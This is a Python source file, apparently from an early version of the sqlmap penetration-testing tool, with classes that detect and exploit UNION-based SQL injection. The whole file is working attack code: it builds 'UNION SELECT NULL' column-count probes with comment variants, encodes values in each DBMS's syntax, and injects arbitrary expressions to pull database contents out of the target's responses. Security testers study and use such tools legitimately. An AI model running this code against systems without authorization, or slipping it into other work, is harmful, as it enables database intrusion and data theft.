#!/usr/bin/env python


import logging
import random
import time

from lib.common import Common


class UnionCheck(Common):
    """
    This class defines methods to check if the target url is affected
    by an inband SQL injection vulnerability

    @author: Bernardo Damele
    """

    def __init__(self, args):
        self.args = args
        self.logger = logging.getLogger("sqlmapLog")


    def __effectiveUnionCheck(self, stm, comment):
        """
        This method checks if the target url is affected by an inband
        SQL injection vulnerability. The test is done up to 50 columns
        on the target database table
        """

        resultDict = {}

        for count in range(50):
            if count:
                stm += ", NULL"

            if self.args.injectionMethod == "numeric":
                checkStm = stm
                if comment:
                    checkStm += comment
            elif self.args.injectionMethod == "stringsingle":
                checkStm = "%s, '1" % stm
                if comment:
                    checkStm += "'%s '" % comment
            elif self.args.injectionMethod == "stringdouble":
                checkStm = stm + ', "1'
                if comment:
                    checkStm += '"%s"' % comment

            baseUrl  = self.urlReplace(newValue=checkStm)
            newResult = self.queryPage(baseUrl)

            if not newResult in resultDict.keys():
                resultDict[newResult] = (1, checkStm)
            else:
                resultDict[newResult] = (resultDict[newResult][0] + 1, checkStm)

            if comment:
                stm = stm.replace(comment, "")

            if count:
                for element in resultDict.values():
                    if element[0] == 1:
                        if self.args.httpMethod == "GET":
                            value = baseUrl

                            if self.args.injectionMethod != "numeric" and value.count("NULL") == 2:
                                value = baseUrl.replace("SELECT NULL,", "SELECT")

                            self.args.unionCount = value.count("NULL")

                            return value
                        elif self.args.httpMethod == "POST":
                            url = baseUrl.split("?")[0]
                            data = baseUrl.split("?")[1]
                            value = "url:\t'%s'" % url

                            if self.args.injectionMethod != "numeric" and value.count("NULL") == 2:
                                data = data.replace("SELECT NULL,", "SELECT")

                            value += "\ndata:\t'%s'\n" % data

                            self.args.unionCount = data.count("NULL")

                            return value

        return None


    def unionCheck(self):
        """
        This method checks if the target url is affected by an inband
        SQL injection vulnerability. The test is done up to 3*50 times
        """

        logMsg  = "testing UNION SELECT statement on "
        logMsg += "parameter '%s'" % self.args.injParameter
        self.logger.info(logMsg)

        stm = self.injectionStm(" UNION SELECT NULL")

        for comment in ("", "--", "#"):
            value = self.__effectiveUnionCheck(stm, comment)

            if value:
                if comment:
                    self.args.unionComment = comment

                return value

        return None


class UnionUse(Common):
    """
    This class defines methods to use the inband SQL injection
    vulnerability of an affected target to extract data from the
    database rather thand through blind SQL injection

    @author: Bernardo Damele
    """

    def __init__(self, args):
        self.args = args
        self.logger = logging.getLogger("sqlmapLog")


    def __dbEncodeValue(self, value):
        """
        This method is used to encode the request with the specific
        remote database management system syntax to avoid issues due
        to conversion of query output data type
        """

        dbEncodedValue = ''

        if "MySQL" in self.args.fingerprint:
            dbEncodedValue = "CHAR("

            for char in value:
                dbEncodedValue += "%d," % ord(char)

            dbEncodedValue  = dbEncodedValue[:-1]
            dbEncodedValue += ")"
        elif "PostgreSQL" in self.args.fingerprint:
            dbEncodedValue = "("

            for char in value:
                dbEncodedValue += "CHR(%d)||" % ord(char)

            dbEncodedValue  = dbEncodedValue[:-2]
            dbEncodedValue += ")"
        elif "Microsoft SQL Server" in self.args.fingerprint:
            dbEncodedValue = "("

            for char in value:
                dbEncodedValue += "CHAR(%d)+" % ord(char)

            dbEncodedValue  = dbEncodedValue[:-2]
            dbEncodedValue += ")"

        return dbEncodedValue


    def __effectiveUnionUse(self, expression, exprPosition):
        """
        This method effectively perform an inband SQL injection on the
        affected url
        """

        stm = self.injectionStm(" UNION SELECT ")

        for element in range(self.args.unionCount):
            if element > 0:
                stm += ", "

            if element == exprPosition:
                stm += "%s" % expression
            else:
                stm += "NULL"

        if self.args.injectionMethod == "numeric" and self.args.unionComment:
            stm += self.args.unionComment
        elif self.args.injectionMethod == "stringsingle":
            stm = stm + ", '1"
            if self.args.unionComment:
                stm += "'%s '" % self.args.unionComment
        elif self.args.injectionMethod == "stringdouble":
            stm = stm + ', "1'
            if self.args.unionComment:
                stm += '"%s"' % self.args.unionComment

        return stm


    def unionUse(self, expression):
        """
        This method checks for an inband SQL injection on the target
        url using the UnionCheck.unionCheck() method, then call its
        subsidiary method to effectively perform an inband SQL
        injection on the affected url
        """

        count = 0
        start = time.time()
        expression = self.unescape(expression)

        warnMsg  = "the target url is not affected by an inband "
        warnMsg += "SQL injection vulnerability or your "
        warnMsg += "expression is wrong"

        if not self.args.unionCount:
            unionObject = UnionCheck(self.args)
            checkUnion = unionObject.unionCheck()

            if checkUnion:
                index = checkUnion.index("UNION")
                splittedUrl = checkUnion[index:]
                self.args.unionCount = splittedUrl.count("NULL")
            else:
                self.logger.warn(warnMsg)
                return self.getValue(expression)

        if not self.args.unionCount:
            self.logger.warn(warnMsg)
            return self.getValue(expression)

        for exprPosition in range(self.args.unionCount):
            randInteger = str(random.randint(10000, 99999))
            randString = "'%s'" % str(random.randint(10000, 99999))

            for randValue in (randInteger, randString):
                # Perform a request using the UNION SELECT statement
                # to check it the target url is affected by an
                # inband SQL injection vulnerability
                dbEncodedValue = self.__dbEncodeValue(randValue)

                if len(dbEncodedValue) > len(expression):
                    expression = expression.zfill(len(dbEncodedValue))
                    expression = expression.replace("0", " ")
                elif len(dbEncodedValue) < len(expression):
                    dbEncodedValue = dbEncodedValue.zfill(len(expression))
                    dbEncodedValue = dbEncodedValue.replace("0", " ")

                stm = self.__effectiveUnionUse(dbEncodedValue, exprPosition)
                baseUrl = self.urlReplace(newValue=stm)
                resultPage = self.getPage(baseUrl)
                count += 1

                # TODO: improve the second if condition (works if the
                # web application is written in PHP, check others)
                randValueReplaced = randValue.replace("'", "")

                if randValueReplaced in resultPage and "Warning" not in resultPage:
                    # Parse the returned page to get the randValue value
                    startPosition = resultPage.index(randValueReplaced)
                    endPosition = startPosition + len(randValueReplaced)
                    endCharacters = resultPage[endPosition:endPosition + 10]

                    # Perform the expression request then parse the
                    # returned page to get the expression output
                    stm = self.__effectiveUnionUse(expression, exprPosition)
                    baseUrl = self.urlReplace(newValue=stm)
                    resultPage = self.getPage(baseUrl)

                    # TODO: improve this check (works if the web
                    # application is written in PHP, check others)
                    if "Warning" in resultPage:
                        continue

                    try:
                        startPage = resultPage[startPosition:]
                        endPosition = startPage.index(endCharacters)
                    except:
                        continue

                    count += 1
                    duration = int(time.time() - start)

                    logMsg = "request: %s" % baseUrl
                    self.logger.info(logMsg)

                    logMsg  = "the target url is affected by an "
                    logMsg += "inband SQL injection vulnerability"
                    self.logger.info(logMsg)

                    logMsg = "performed %d queries in %d seconds" % (count, duration)
                    self.logger.info(logMsg)

                    value = str(startPage[:endPosition])

                    if self.args.writeFile:
                        self.args.writeFile.write("%s][%s][%s" % (self.args.url, expression, value.replace("\n", "__NEWLINE__").replace("\t", "__TAB__")))
                        self.args.writeFile.flush()

                    return value

        self.logger.warn(warnMsg)

        return self.getValue(expression)

